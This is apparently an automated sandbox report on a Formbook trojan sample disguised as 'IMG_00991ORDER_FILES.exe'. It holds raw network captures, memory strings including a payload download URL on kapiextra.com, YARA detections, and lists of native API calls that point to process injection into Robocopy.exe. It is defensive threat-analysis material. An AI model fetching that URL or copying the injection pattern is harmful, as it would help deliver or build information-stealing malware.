a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:51:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:51:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:51:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:28 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:31 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:39.7128638Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:37 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:42.0304318Z

Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: IMG_00991ORDER_FILES.exe, 00000000.00000000.5788656915.000000000040A000.00000008.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000000.6546131964.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000626000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.bin
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.bin4
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.binT
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.binX
Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: IMG_00991ORDER_FILES.exe
Source: initial sample	Static PE information: Filename: IMG_00991ORDER_FILES.exe

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352134E0 NtCreateMutant,LdrInitializeThunk,	3_2_352134E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_35212D10
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_35212B90
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212A80 NtClose,LdrInitializeThunk,	3_2_35212A80
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35214570 NtSuspendThread,	3_2_35214570
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35214260 NtSetContextThread,	3_2_35214260
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212D50 NtWriteVirtualMemory,	3_2_35212D50
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212DA0 NtReadVirtualMemory,	3_2_35212DA0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212DC0 NtAdjustPrivilegesToken,	3_2_35212DC0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212C20 NtSetInformationFile,	3_2_35212C20
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35213C30 NtOpenProcessToken,	3_2_35213C30
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212C30 NtMapViewOfSection,	3_2_35212C30
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212C10 NtOpenProcess,	3_2_35212C10
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212C50 NtUnmapViewOfSection,	3_2_35212C50
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35213C90 NtOpenThread,	3_2_35213C90
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212CF0 NtDelayExecution,	3_2_35212CF0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212CD0 NtEnumerateKey,	3_2_35212CD0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212F30 NtOpenDirectoryObject,	3_2_35212F30
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212F00 NtCreateFile,	3_2_35212F00
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212FB0 NtSetValueKey,	3_2_35212FB0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212E00 NtQueueApcThread,	3_2_35212E00
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212E50 NtCreateSection,	3_2_35212E50
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212EB0 NtProtectVirtualMemory,	3_2_35212EB0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212E80 NtCreateProcessEx,	3_2_35212E80
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212EC0 NtQuerySection,	3_2_35212EC0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212ED0 NtResumeThread,	3_2_35212ED0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352129F0 NtReadFile,	3_2_352129F0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352129D0 NtWaitForSingleObject,	3_2_352129D0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A334E0 NtCreateMutant,LdrInitializeThunk,	5_2_04A334E0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A34570 NtSuspendThread,LdrInitializeThunk,	5_2_04A34570
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A34260 NtSetContextThread,LdrInitializeThunk,	5_2_04A34260
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32CF0 NtDelayExecution,LdrInitializeThunk,	5_2_04A32CF0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32C30 NtMapViewOfSection,LdrInitializeThunk,	5_2_04A32C30
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32C50 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04A32C50
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32DA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_04A32DA0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32D10 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04A32D10
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32ED0 NtResumeThread,LdrInitializeThunk,	5_2_04A32ED0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32E00 NtQueueApcThread,LdrInitializeThunk,	5_2_04A32E00
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32E50 NtCreateSection,LdrInitializeThunk,	5_2_04A32E50
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32F00 NtCreateFile,LdrInitializeThunk,	5_2_04A32F00
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A338D0 NtGetContextThread,LdrInitializeThunk,	5_2_04A338D0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A329F0 NtReadFile,LdrInitializeThunk,	5_2_04A329F0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32A80 NtClose,LdrInitializeThunk,	5_2_04A32A80
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32AC0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_04A32AC0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32A10 NtWriteFile,LdrInitializeThunk,	5_2_04A32A10
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32B80 NtCreateKey,LdrInitializeThunk,	5_2_04A32B80
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32B90 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04A32B90
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32BC0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04A32BC0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32B00 NtQueryValueKey,LdrInitializeThunk,	5_2_04A32B00
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32B10 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04A32B10
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A33C90 NtOpenThread,	5_2_04A33C90
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32CD0 NtEnumerateKey,	5_2_04A32CD0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32C20 NtSetInformationFile,	5_2_04A32C20
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A33C30 NtOpenProcessToken,	5_2_04A33C30
